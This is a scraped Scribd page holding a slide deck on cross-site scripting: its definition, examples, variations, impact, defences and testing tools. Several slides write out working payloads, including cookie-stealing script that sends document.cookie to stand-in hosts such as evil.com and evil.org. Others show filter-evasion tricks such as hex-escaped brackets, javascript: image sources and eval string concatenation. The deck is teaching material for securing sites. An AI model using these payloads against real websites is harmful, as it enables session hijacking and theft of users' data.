0% found this document useful (0 votes)
285 views4 pages

XSS

Cross-site scripting (XSS) is a type of injection attack where malicious scripts are injected into trusted websites. XSS occurs when data entered by users is displayed within a web page without being validated, sanitized or encoded. This enables attackers to execute scripts in the victim's browser and steal user cookies, session tokens or other sensitive information. The document discusses examples of XSS attacks, variations, ways to circumvent input filtering, and tools that can be used to test for XSS vulnerabilities. It emphasizes that proper input validation is needed to prevent XSS and secure websites against such attacks.

Uploaded by

anil
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
285 views4 pages

XSS

Cross-site scripting (XSS) is a type of injection attack where malicious scripts are injected into trusted websites. XSS occurs when data entered by users is displayed within a web page without being validated, sanitized or encoded. This enables attackers to execute scripts in the victim's browser and steal user cookies, session tokens or other sensitive information. The document discusses examples of XSS attacks, variations, ways to circumvent input filtering, and tools that can be used to test for XSS vulnerabilities. It emphasizes that proper input validation is needed to prevent XSS and secure websites against such attacks.

Uploaded by

anil
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 4

First Some Credit

„ David Zimmer: “Real World XSS”


article.
„ Gunter Ollmann: “HTML Code
Injection and XSS”
„ Amit Klein: “XSS Explained”
„ GNUCITIZEN.ORG
Cross Site Scripting

Definition of XSS Example


„ An app level attack „ vulscript at vulsite, reads HTTP req,
„ Involves 3 parties echoes back w/o first sanitizing…
„ GET /vulscript.cgi?name=dylim
„ Want diverse and personalized HTTP/1.0
delivery Host: www.vulsite.org
„ but web app fails to validate user „ <HTML><Title>Welcome</Title> Hi
supplied input dylim… </HTML>
„ Attacker can craft link which causes the
„ Marc Slemko: XSS doesn’t have to be web browser to access vulsite, invoke
XS, or S. vulscript, with data=evilscript.
„ Goal: STEAL!!! „ Note that evilscript can access my
cookies related to vulsite.

Example cont’d Variations


„ Such a link could be: „ Other HTML tags
<b onMouseOver="self.location.href='http://evil.org/'"> bolded
„ http://www.vulsite.org/vulscript.cgi?name= text</b>

<script>alert(document.cookie)</script> „ POST, HTTP headers (referrer), path of


HTTP req (e.g. if error page returns the
„ Or erroneous path)
<script>window.open(“http://evil.com/stealcoo
kie.cgi?cookie=“+document.cookie)</script>
„ Typical formatting
„ <img src = "malicious.js">
„ <script>alert('hacked')</script>
„ <iframe = "malicious.js">
„ <script>document.write('<img
src="http://evil.org/'+document.cookie+'")
</script>
„ <a href="javascript:…">click-me</a>

1
Variations What about…
„ Flash! attack… „ data:text/html;base64,PHNjcmlwdD4
„ ActionScript, getURL() NCmFsZXJ0KCJTZWxmLWNvbnRhaW
5lZCBYU1MiKTsNCjwvc2NyaXB0Pg==
„ Self contained! i.e. doesn’t require
vulnerable web resource to echo
input.
„ allows dynamic creation of binary files
from JavaScript (can create files
containing malicious payload for
exploiting overflow vulnerabilities.)

XSS as an attack vector Impact


„ Strengths „ Theft of Account/Services
Can include very large audience w one injection
„
point
„ User Tracking/Stats
„ Can force users to some action, and access info „ Browser/User exploitation
they can access
„ Credentialed Misinformation
„ Can be hard to detect and slipped in quietly
„ Can be powerful for info display and alteration. „ Free Information Dissemination

„ Weaknesses
„ 95% can be avoided with proper filtering on
any user supplied data (several tools)

Together with Phishing, etc… Securing a site


„ Only here! By everything for „ Input sanitation
cheap.msg „ Programmer needs to cover all possible input
sources (query params, HTTP headers, etc)
„ PayPal Urgent Problems with „ Useless against vulnerabilities in 3rd party
Account Information.msg scripts/servers (e.g. err pages)
„ Save the world.msg „ Output filtering..
„ App firewalls
„ Can cover all input methods in a generic way.
„ Intercepts XSS attacks b4 they reach server.

2
Injection Points Filtering
„ Active XSS attacks „ Do you want to deny users the ability
„ Parameters passed in thru query string to use any form of HTML?
arguments that get written directly to a „ If not, what do you filter?
page. „ <plaintext>
„ Any where an html form can be injected „ 10M x 10M image of attacker
and have the user click a submit button
„ Passive XSS attacks
„ Database storage!
„ Error pages!

Filtering Many ways to circumvent


„ Img src and href… „ Simple filtering < and >
„ Parse out src= element and validate it: „ Use \x3c and \x3e
„ Remove quotes „ Commenting out malicious code
„ Deny urls with ? Querystring ids, make sure „ Just close the comment filter:
no .cgi, .pl, etc. <script>- --></comment>…</script>
„ Chk the protocol and deny everything except „ Separate window handling
http „ <a href="javascript:…">click-me</a> becomes:
<a href="javascript:…" target="_blank">click-me</a>
„ <a href="javascript:..." foo="bar>click-me</a>
<a href="javascript:..." foo="bar
target="_blank">click-me</a>

XSS tips and tricks. XSS tips and tricks..


„ script injection in an image src tag.. „ Limited input length + script block embed
= unlimited script power (script src=)
„ SSL pages warn if script src comes from
untrusted site,
„ but if you can upload say img that is actually .js
commands..
„ Embed nested quotes..
„ methods of script encoding.
„ \’ or \”, or \u0022 \u0027
„ <img
„ Keyword filters that allow any js to src='vbscript:do%63ument.lo%63ation="http:/
execute are useless: /a.b.com"'>
„ <IMG SRC="javascript:alert('test');">
„ A = ‘navi’; B = ‘gator.userAgent’;
„ <IMG SRC="javasc ript:alert('test');">
alert(eval(A+B)) „ Line break trick

3
Tools..
„ AppShield, AppScan by Sanctum
„ WebInspect
„ Utilities by David Zimmer
„ E.g. script encoding
„ XSS cheat sheet
http://ha.ckers.org/xss.html
„ XSS Shell, Backweb, XSS proxy,
BEEF…

You might also like